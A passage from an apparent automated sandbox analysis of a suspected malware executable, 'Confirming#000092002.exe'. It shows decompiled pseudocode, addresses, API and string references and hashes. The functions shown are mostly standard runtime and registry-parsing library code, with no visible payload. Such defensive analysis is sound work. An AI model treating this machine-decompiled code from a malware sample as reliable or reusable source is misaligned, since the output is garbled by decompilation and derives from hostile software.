						E00EAA7BA(_t48, _t57, 0, 0xfe27f8, 0, 0xfe27f8, 0x104);
						_t26 =  *0xfe2db8; // 0x1443350
						 *0xfe2da8 = 0xfe27f8;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0xfe27f8;
							_v20 = 0xfe27f8;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E00EA7F8F(E00EA7E1B( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E00EA7E1B( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E00EAA6AD(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0xfe2dac = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0xfe2db0 = _t58;
											L18:
											E00EA8B82(_t37);
											_v12 = 0;
											L19:
											E00EA8B82(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0xfe2dac = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0xfe2db0 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E00EA75D4(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E00EA75D4(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E00EA748C();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x00ea7ce5
0x00ea7cee
0x00ea7cf3
0x00ea7cfd
0x00ea7d00
0x00ea7d1d
0x00ea7d1e
0x00ea7d31
0x00ea7d36
0x00ea7d3e
0x00ea7d44
0x00ea7d47
0x00ea7d49
0x00ea7d50
0x00ea7d50
0x00ea7d52
0x00ea7d55
0x00ea7d58
0x00ea7d5f
0x00ea7d78
0x00ea7d7d
0x00ea7d7f
0x00ea7da0
0x00ea7da8
0x00ea7dab
0x00ea7dc6
0x00ea7dc9
0x00ea7dd0
0x00ea7dd4
0x00ea7dd6
0x00ea7ddd
0x00ea7de0
0x00ea7de2
0x00ea7de4
0x00ea7de6
0x00ea7df0
0x00ea7df0
0x00ea7df2
0x00ea7df8
0x00ea7dfb
0x00ea7dfd
0x00ea7e03
0x00ea7e04
0x00ea7e0a
0x00ea7e0d
0x00ea7e0e
0x00ea7e14
0x00ea7e17
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea7de8
0x00ea7de8
0x00ea7de8
0x00ea7deb
0x00ea7dec
0x00ea7dec
0x00000000
0x00ea7de8
0x00ea7dd8
0x00000000
0x00ea7dd8
0x00ea7db0
0x00ea7db0
0x00ea7db1
0x00ea7db6
0x00ea7db8
0x00ea7dba
0x00ea7dbf
0x00ea7dbf
0x00000000
0x00ea7dbf
0x00ea7d81
0x00ea7d86
0x00ea7d88
0x00ea7d89
0x00000000
0x00ea7d89
0x00ea7d4b
0x00ea7d4e
0x00000000
0x00000000
0x00000000
0x00ea7d4e
0x00ea7d02
0x00ea7d05
0x00000000
0x00000000
0x00ea7d07
0x00ea7d0e
0x00ea7d0f
0x00ea7d11
0x00ea7d16
0x00000000
0x00ea7d16
0x00000000

Strings

C:\Users\user\Desktop\Confirming#000092002.exe, xrefs: 00EA7D28, 00EA7D2F, 00EA7D65

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Confirming#000092002.exe
API String ID: 0-2125958311
Opcode ID: b9cfcaa721981d05e8f27296d116aac5779fe07ccd144c276228309ed372382f
Instruction ID: f2c2a9fc57bb0721bfb3293ced006fd3362b8c7e27666ba5efbc5b740ff18678
Opcode Fuzzy Hash: b9cfcaa721981d05e8f27296d116aac5779fe07ccd144c276228309ed372382f
Instruction Fuzzy Hash: 40417371A08258AFCB21DF998C819AEBBF8EF8E314F14506AE544FF211D7706E40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EA64B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E00EA64B6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00EA5DCC(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00EA5DCC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00EA4F23(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00EA4E56(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00EA6091(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00EA8A26(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00ea64b6
0x00ea64b6
0x00ea64bd
0x00ea64c6
0x00ea65e5
0x00ea64cc
0x00ea64cc
0x00ea64cd
0x00ea64ce
0x00ea64d8
0x00ea64db
0x00ea64e1
0x00ea64eb
0x00ea6510
0x00ea6515
0x00ea651a
0x00ea65e1
0x00000000
0x00ea65e2
0x00ea651a
0x00ea64eb
0x00ea6520
0x00ea6523
0x00ea6526
0x00ea652c
0x00ea6532
0x00ea6544
0x00ea6549
0x00ea654c
0x00ea654f
0x00ea6552
0x00ea6555
0x00ea655b
0x00ea6561
0x00ea6564
0x00ea6567
0x00ea6576
0x00ea6577
0x00ea6577
0x00ea657c
0x00ea658f
0x00ea6591
0x00ea6596
0x00ea65a1
0x00ea65a3
0x00ea65a5
0x00ea65c1
0x00ea65c6
0x00ea65c9
0x00ea65c9
0x00ea65a1
0x00ea6596
0x00ea65cf
0x00ea65d0
0x00ea65d3
0x00ea65d6
0x00ea65d9
0x00ea65dc
0x00ea6567
0x00000000
0x00ea655b
0x00ea65e6
0x00ea65eb
0x00ea65ef
0x00ea65f2
0x00ea65f3
0x00ea65f4
0x00ea65f5
0x00ea65fa
0x00ea6672
0x00ea6674
0x00ea65fc
0x00ea65fc
0x00ea6602
0x00000000
0x00ea6604
0x00ea6607
0x00ea660a
0x00ea6611
0x00ea6614
0x00ea6618
0x00ea664a
0x00ea664d
0x00ea6654
0x00ea665a
0x00ea6664
0x00ea666d
0x00ea666d
0x00ea6664
0x00ea665a
0x00ea666e
0x00ea661a
0x00ea661a
0x00ea661a
0x00ea661d
0x00ea661d
0x00ea6621
0x00000000
0x00000000
0x00ea6625
0x00ea6639
0x00ea6639
0x00ea6627
0x00ea6627
0x00ea662d
0x00000000
0x00ea662f
0x00ea662f
0x00ea6632
0x00ea6637
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea6637
0x00ea662d
0x00ea6642
0x00ea6644
0x00000000
0x00ea6646
0x00ea6646
0x00ea6646
0x00000000
0x00ea6644
0x00ea663d
0x00ea663f
0x00000000
0x00ea663f
0x00000000
0x00000000
0x00000000
0x00ea660a
0x00ea6602
0x00ea6675
0x00ea6679
0x00ea6679

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00EA64DB

Strings

RCC, xrefs: 00EA64F5
MOC, xrefs: 00EA64ED

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 60dbeaa94420034b7a80aca16de02220d569ed711bc1904a87e8479527d4fa4b
Instruction ID: e0c14e4e68d739ffd764327054392e1355c6caca9596a5620bacf98353264f75
Opcode Fuzzy Hash: 60dbeaa94420034b7a80aca16de02220d569ed711bc1904a87e8479527d4fa4b
Instruction Fuzzy Hash: DD417B72D00209AFCF15DFA4C981AAEBBB5FF4E304F185499F9147B265D335AA50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2C50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
stringCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00EA2C50(CHAR* __ebx, CHAR** __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				signed int _v8;
				char _v4104;
				signed int _v4108;
				intOrPtr _v4112;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				char _t38;
				char* _t52;
				intOrPtr* _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				char _t66;
				signed int _t67;
				signed int _t68;
				void* _t69;

				_t69 = __eflags;
				_t63 = __edx;
				_t51 = __ebx;
				E00EB02C0(0x100c);
				_t29 =  *0xeb9008; // 0x64e1d101
				_v8 = _t29 ^ _t68;
				_v4108 = _v4108 & 0x00000000;
				_t64 = __ecx;
				_t66 = E00EA29E8(__ebx, __ecx, __ecx, _t65, _t69, _a4,  &_v4108);
				if(_t66 >= 0) {
					_push(__ebx);
					_t52 = _v4108;
					 *((intOrPtr*)(__ecx)) = _t52;
					if( *_t52 != 0) {
						while(1) {
							_t66 = E00EA2327(_t64,  &_v4104);
							if(_t66 < 0) {
								goto L7;
							}
							_t67 = 0;
							while(lstrcmpiA( &_v4104,  *(0xeb61b0 + _t67 * 8)) != 0) {
								_t67 = _t67 + 1;
								if(_t67 < 0xe) {
									continue;
								} else {
									L6:
									_t66 = 0x80020009;
								}
								goto L7;
							}
							_t38 =  *((intOrPtr*)(0xeb61b4 + _t67 * 8));
							_v4108 = _t38;
							__eflags = _t38;
							if(_t38 == 0) {
								goto L6;
							} else {
								_t66 = E00EA2327(_t64,  &_v4104);
								__eflags = _t66;
								if(_t66 < 0) {
									goto L7;
								} else {
									__eflags = _v4104 - 0x7b;
									if(_v4104 != 0x7b) {
										goto L6;
									} else {
										__eflags = _a8;
										_t60 = _t64;
										_push(0);
										if(_a8 == 0) {
											_push(0);
											_push(_v4108);
											_push( &_v4104);
											_t66 = E00EA2DA0(_t60, _t63);
											__eflags = _t66;
											if(_t66 < 0) {
												goto L7;
											} else {
												goto L16;
											}
										} else {
											_push(_a8);
											_push(_v4108);
											_v4112 =  *_t64;
											_push( &_v4104);
											_t66 = E00EA2DA0(_t60, _t63);
											__eflags = _t66;
											if(_t66 >= 0) {
												L16:
												E00EA22FE(_t64);
												__eflags =  *((char*)( *_t64));
												if( *((char*)( *_t64)) != 0) {
													continue;
												} else {
													goto L7;
												}
											} else {
												 *_t64 = _v4112;
												E00EA2DA0(_t64, _t63,  &_v4104, _v4108, 0, 0);
												goto L7;
											}
										}
									}
								}
							}
							L18:
						}
					}
					L7:
					__imp__CoTaskMemFree();
					_t32 = _t66;
					_t51 = _t52;
				}
				return E00EA403C(_t32, _t51, _v8 ^ _t68, _t63, _t64, _t66);
				goto L18;
			}

0x00ea2c50
0x00ea2c50
0x00ea2c50
0x00ea2c58
0x00ea2c5d
0x00ea2c64
0x00ea2c6a
0x00ea2c73
0x00ea2c84
0x00ea2c88
0x00ea2c8a
0x00ea2c8b
0x00ea2c91
0x00ea2c96
0x00ea2c98
0x00ea2ca6
0x00ea2caa
0x00000000
0x00000000
0x00ea2cac
0x00ea2cae
0x00ea2cc6
0x00ea2cca
0x00000000
0x00ea2ccc
0x00ea2ccc
0x00ea2ccc
0x00ea2ccc
0x00000000
0x00ea2cca
0x00ea2ceb
0x00ea2cf2
0x00ea2cf8
0x00ea2cfa
0x00000000
0x00ea2cfc
0x00ea2d0a
0x00ea2d0c
0x00ea2d0e
0x00000000
0x00ea2d10
0x00ea2d10
0x00ea2d17
0x00000000
0x00ea2d19
0x00ea2d19
0x00ea2d1d
0x00ea2d1f
0x00ea2d21
0x00ea2d6b
0x00ea2d6d
0x00ea2d79
0x00ea2d7f
0x00ea2d81
0x00ea2d83
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2d23
0x00ea2d23
0x00ea2d28
0x00ea2d2e
0x00ea2d3a
0x00ea2d40
0x00ea2d42
0x00ea2d44
0x00ea2d89
0x00ea2d8b
0x00ea2d92
0x00ea2d95
0x00000000
0x00ea2d9b
0x00000000
0x00ea2d9b
0x00ea2d46
0x00ea2d58
0x00ea2d61
0x00000000
0x00ea2d61
0x00ea2d44
0x00ea2d21
0x00ea2d17
0x00ea2d0e
0x00000000
0x00ea2cfa
0x00ea2c98
0x00ea2cd1
0x00ea2cd2
0x00ea2cd8
0x00ea2cda
0x00ea2cda
0x00ea2ce8
0x00000000

APIs

Part of subcall function 00EA29E8: __EH_prolog3_GS.LIBCMT ref: 00EA29EF
Part of subcall function 00EA29E8: _strlen.LIBCMT ref: 00EA2A14
Part of subcall function 00EA29E8: CoTaskMemAlloc.OLE32(00000000,00000040,00EA2C84,?,00000000,00000000,?), ref: 00EA2A2E
Part of subcall function 00EA29E8: CoTaskMemFree.OLE32(?), ref: 00EA2C39

CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000000,?), ref: 00EA2CD2

Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
Part of subcall function 00EA2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5

lstrcmpiA.KERNEL32(?,?,00000000,?,00000000,00000000,?), ref: 00EA2CBC

Strings

{, xrefs: 00EA2D10

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CharNext$Task$Free$AllocH_prolog3__strlenlstrcmpi
String ID: {
API String ID: 200014448-366298937
Opcode ID: cc7111aa3afaa72636b81be0e413faf70e9a5ec204daa3ebc3c9d661dd6eeb1d
Instruction ID: ca3dce14f9e7b4b1cdbe3f56dcab152a343deb207d847c57d912e97fafe9a4f7
Opcode Fuzzy Hash: cc7111aa3afaa72636b81be0e413faf70e9a5ec204daa3ebc3c9d661dd6eeb1d
Instruction Fuzzy Hash: 3431C431E002659FCF229B68CC40BDEBBA5AF4E321F041199EA48FB241D7B4EDC48B50

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1DBF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00EA1DBF(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				void* _t16;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t29;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				void* _t45;

				_t40 = __edi;
				_push(0x10);
				E00EB0216(0xeb07fb, __ebx, __edi, __esi);
				_t28 = __edx;
				 *((intOrPtr*)(_t43 - 0x1c)) = __ecx;
				_t42 = 0;
				 *((intOrPtr*)(_t43 - 0x18)) = 0;
				 *((intOrPtr*)(_t43 - 4)) = 0;
				_t15 = E00EA75E7(L"REGISTRY") + 1;
				 *((intOrPtr*)(_t43 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
				_t16 = E00EA1181(_t43 - 0x14, _t15);
				_t45 = _t44 + 4;
				if(_t16 < 0) {
					L7:
					_t29 = 0x8007000e;
				} else {
					_t40 =  *((intOrPtr*)(_t43 - 0x14));
					_t49 = _t40 - 0x400;
					if(_t40 > 0x400 || E00EA11AE(_t28, _t40, _t40, 0, _t49) == 0) {
						_t20 = E00EA3CD7(_t43 - 0x18, _t42, _t40);
						_t42 =  *((intOrPtr*)(_t43 - 0x18));
					} else {
						E00EB02F0(_t40);
						_t20 = _t45;
					}
					_t21 = E00EA1251(_t20, L"REGISTRY", _t40, 3);
					_t51 = _t21;
					if(_t21 == 0) {
						goto L7;
					} else {
						_t29 = E00EA1B39(_t28,  *((intOrPtr*)(_t43 - 0x1c)), _t40, _t42, _t51, _t28,  *(_t43 + 8) & 0x0000ffff, _t21, 1);
					}
				}
				if(_t42 != 0) {
					do {
						_t40 =  *_t42;
						_t42 = _t40;
						E00EA7188(_t42);
					} while (_t40 != 0);
				}
				return E00EB01C5(_t29, _t40, _t42);
			}

0x00ea1dbf
0x00ea1dbf
0x00ea1dc6
0x00ea1dcb
0x00ea1dcd
0x00ea1dd0
0x00ea1dd2
0x00ea1dda
0x00ea1de2
0x00ea1de8
0x00ea1deb
0x00ea1df0
0x00ea1df5
0x00ea1e4c
0x00ea1e4c
0x00ea1df7
0x00ea1df7
0x00ea1dfa
0x00ea1e00
0x00ea1e1c
0x00ea1e21
0x00ea1e0d
0x00ea1e0f
0x00ea1e14
0x00ea1e14
0x00ea1e2e
0x00ea1e33
0x00ea1e35
0x00000000
0x00ea1e37
0x00ea1e48
0x00ea1e48
0x00ea1e35
0x00ea1e53
0x00ea1e55
0x00ea1e55
0x00ea1e58
0x00ea1e5a
0x00ea1e60
0x00ea1e55
0x00ea1e6e

APIs

__EH_prolog3_GS.LIBCMT ref: 00EA1DC6

Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1

__alloca_probe_16.LIBCMT ref: 00EA1E0F

Strings

REGISTRY, xrefs: 00EA1DD5, 00EA1E27

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: b739fae44898f3a7cf420f4c78028bc621d3d3c4ccaa2652ecae79d36c94ffdd
Instruction ID: ee4224d188c0dd0207c8d8caf3a88e29fe7a3962ef97177493a47771592d5ceb
Opcode Fuzzy Hash: b739fae44898f3a7cf420f4c78028bc621d3d3c4ccaa2652ecae79d36c94ffdd
Instruction Fuzzy Hash: FF11A732F0121557CB10ABA488426FFB2E59F9E754F14A055FE42BF242EA74FD4187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1F97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00EA1F97(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t29;
				void* _t30;
				intOrPtr* _t43;
				void* _t44;
				void* _t45;
				void* _t46;

				_t41 = __edi;
				_push(0x10);
				E00EB0216(0xeb07fb, __ebx, __edi, __esi);
				_t29 = __edx;
				 *((intOrPtr*)(_t44 - 0x1c)) = __ecx;
				_t43 = 0;
				 *((intOrPtr*)(_t44 - 0x18)) = 0;
				 *(_t44 - 4) =  *(_t44 - 4) & 0;
				_t16 = E00EA75E7(L"REGISTRY") + 1;
				 *((intOrPtr*)(_t44 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
				_t17 = E00EA1181(_t44 - 0x14, _t16);
				_t46 = _t45 + 4;
				if(_t17 < 0) {
					L7:
					_t30 = 0x8007000e;
				} else {
					_t41 =  *((intOrPtr*)(_t44 - 0x14));
					_t50 = _t41 - 0x400;
					if(_t41 > 0x400 || E00EA11AE(_t29, _t41, _t41, 0, _t50) == 0) {
						_t21 = E00EA3CD7(_t44 - 0x18, _t43, _t41);
						_t43 =  *((intOrPtr*)(_t44 - 0x18));
					} else {
						E00EB02F0(_t41);
						_t21 = _t46;
					}
					_t22 = E00EA1251(_t21, L"REGISTRY", _t41, 3);
					_t52 = _t22;
					if(_t22 == 0) {
						goto L7;
					} else {
						_t30 = E00EA1B39(_t29,  *((intOrPtr*)(_t44 - 0x1c)), _t41, _t43, _t52, _t29,  *(_t44 + 8) & 0x0000ffff, _t22, 0);
					}
				}
				if(_t43 != 0) {
					do {
						_t41 =  *_t43;
						_t43 = _t41;
						E00EA7188(_t43);
					} while (_t41 != 0);
				}
				return E00EB01C5(_t30, _t41, _t43);
			}

0x00ea1f97
0x00ea1f97
0x00ea1f9e
0x00ea1fa3
0x00ea1fa5
0x00ea1fa8
0x00ea1faa
0x00ea1fad
0x00ea1fba
0x00ea1fc0
0x00ea1fc3
0x00ea1fc8
0x00ea1fcd
0x00ea2024
0x00ea2024
0x00ea1fcf
0x00ea1fcf
0x00ea1fd2
0x00ea1fd8
0x00ea1ff4
0x00ea1ff9
0x00ea1fe5
0x00ea1fe7
0x00ea1fec
0x00ea1fec
0x00ea2006
0x00ea200b
0x00ea200d
0x00000000
0x00ea200f
0x00ea2020
0x00ea2020
0x00ea200d
0x00ea202b
0x00ea202d
0x00ea202d
0x00ea2030
0x00ea2032
0x00ea2038
0x00ea202d
0x00ea2046

APIs

__EH_prolog3_GS.LIBCMT ref: 00EA1F9E

Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1

__alloca_probe_16.LIBCMT ref: 00EA1FE7

Strings

REGISTRY, xrefs: 00EA1FB0, 00EA1FFF

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: 0f5d760dedf7c278e9a672447b200ef3de977c9f20c4f22bd5dd62dfad0774b2
Instruction ID: f0a98b3b79c351279766c5977685376828f8ba8cbf9f75f7684e30424bf01183
